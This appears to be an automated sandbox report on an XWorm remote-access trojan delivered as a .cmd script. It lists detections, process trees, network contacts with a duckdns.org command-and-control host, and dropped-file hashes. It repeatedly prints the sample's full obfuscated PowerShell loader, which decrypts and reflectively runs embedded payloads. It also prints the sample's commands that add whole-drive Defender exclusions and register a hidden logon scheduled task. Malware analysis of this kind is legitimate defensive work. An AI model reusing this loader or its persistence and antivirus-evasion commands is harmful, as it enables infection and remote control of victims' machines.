Analysis Overview
SHA256
2d22aad1f20e40c0a557741d6366ec2f61bc505ca491672d240b233079c9a70c
Threat Level: Known bad
The file 2d22aad1f20e40c0a557741d6366ec2f61bc505ca491672d240b233079c9a70c was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-11 23:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 23:33
Reported
2024-06-11 23:36
Platform
win7-20240215-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1888 wrote to memory of 3040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1888 wrote to memory of 3040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1888 wrote to memory of 3040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3040 wrote to memory of 2520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3040 wrote to memory of 2520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3040 wrote to memory of 2520 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3040 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3040 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3040 wrote to memory of 2556 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb 
([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 23:33
Reported
2024-06-11 23:36
Platform
win10v2004-20240426-en
Max time kernel
135s
Max time network
151s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb 
([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 8009' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\SC3.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\SC3.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\SC3.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 
6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC3')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 8009' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | udp |
| CO | 186.169.73.205:7772 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | tcp |
| US | 8.8.8.8:53 | 205.73.169.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | udp |
| CO | 186.169.73.205:7772 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vibvto4n.5el.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ecceac16628651c18879d836acfcb062 |
| SHA1 | 420502b3e5220a01586c59504e94aa1ee11982c9 |
| SHA256 | 58238de09a8817ed9f894ed8e5bf06a897fd08e0b0bd77e508d37b2598edd2a9 |
| SHA512 | be3c7cb529cafb00f58790a6f8b35c4ff6db9f7f43a507d2218fd80cebc88413e46f71b1bc35b8afcc36b68f9409c946470d1e74a4fe225400eeb6f3f898f5b3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d814b7411c2ac2f79b4d3a9cab93e141 |
| SHA1 | f8ca458a448feba152ccf735f8ec07442fb80a73 |
| SHA256 | 5100f85fcd8f613e5413d821cb16a70031b43089c2c60f0d8ae195e855112394 |
| SHA512 | 8e20b12f339c5a1cd03b50fbe8e3b280561d20f95ac3bed8e002152dd8661ccced67b7374e830b0d17e3e0ba39063007abbaafa2854726b7c55f40c06239f1cc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e4de99c1795fd54aa87da05fa39c199c |
| SHA1 | dfaaac2de1490fae01104f0a6853a9d8fe39a9d7 |
| SHA256 | 23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457 |
| SHA512 | 796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926 |
C:\Users\Admin\AppData\Roaming\SC3.cmd
| MD5 | aebbb92d1f67cddf37f996695175153e |
| SHA1 | 8706b8f0d37fb05aa70f32d78c3d8469b64c7c27 |
| SHA256 | 2ad358d7ccdb651d4603cb591a2eb19416ed453a8cf19c82cb2717477db518a7 |
| SHA512 | 60e261b245fb23c75cd7fc0e507daa3e6f39f7f86261622ca90fd21dafda481abd0d80d7befe01ebe31a3f25485df298445662dfb8041fa0e607c85c31425ce6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e4875d006129f4902a6892a3754d278d |
| SHA1 | 6a2c7ed12e062fcfed63f34c35441edf3444b8fa |
| SHA256 | 6a4d2d208032d4292f2ab0ef820a53cc33095b199cecf61b9239af4184a3a052 |
| SHA512 | d4a8de335c6933a201f8d46a89566d850b2b9364e058ae30b7113f30e2a7e544a8cf0aeb0bda990263798f5052afcc641609566458347d4f030c2ddead0a2ef3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 254f97caf20b39d0846821965f6c1d4b |
| SHA1 | 6b8492bf210551112d74fdba59c06e01e498959d |
| SHA256 | c6698a3842dfc6493ca85cda0e881bd077f928bf5d707c8db45b5bc2c4910569 |
| SHA512 | 9bc7e382d0597b7ba94d6a2447bfcfda5f6bd43dfcdee2e7796d7b527b4e99d68cc0f0a347668f07cc6aa25a63b1aa1b4d84c7abd4204ef64eee9b0b55e9dcc9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2c312978ff5c2b444b5667ba4c479f2a |
| SHA1 | 0910f579df9dbf6a9e0b8fc4c474d53fe9bc3f2f |
| SHA256 | 43c50ae17f6595ba2015900cbb8c415f9ce79fddacf97b7a2ce03b7f499bd5b0 |
| SHA512 | 2e51aea38fdc94fb7ab3bb39f9d6778c44b8e82fd97bb4249eda0207b5e2ce49d36512197661df7986ba014f62fab47f13bd3cfff9e6bf2de194d40c3524c3a8 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-11 23:33
Reported
2024-06-11 23:36
Platform
win7-20240419-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1936 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1936 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 1936 wrote to memory of 2456 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2456 wrote to memory of 1296 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2456 wrote to memory of 1296 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2456 wrote to memory of 1296 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2456 wrote to memory of 2148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2456 wrote to memory of 2148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2456 wrote to memory of 2148 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb 
([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-11 23:33
Reported
2024-06-11 23:36
Platform
win10v2004-20240611-en
Max time kernel
146s
Max time network
152s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd
C:\Windows\system32\cmd.exe
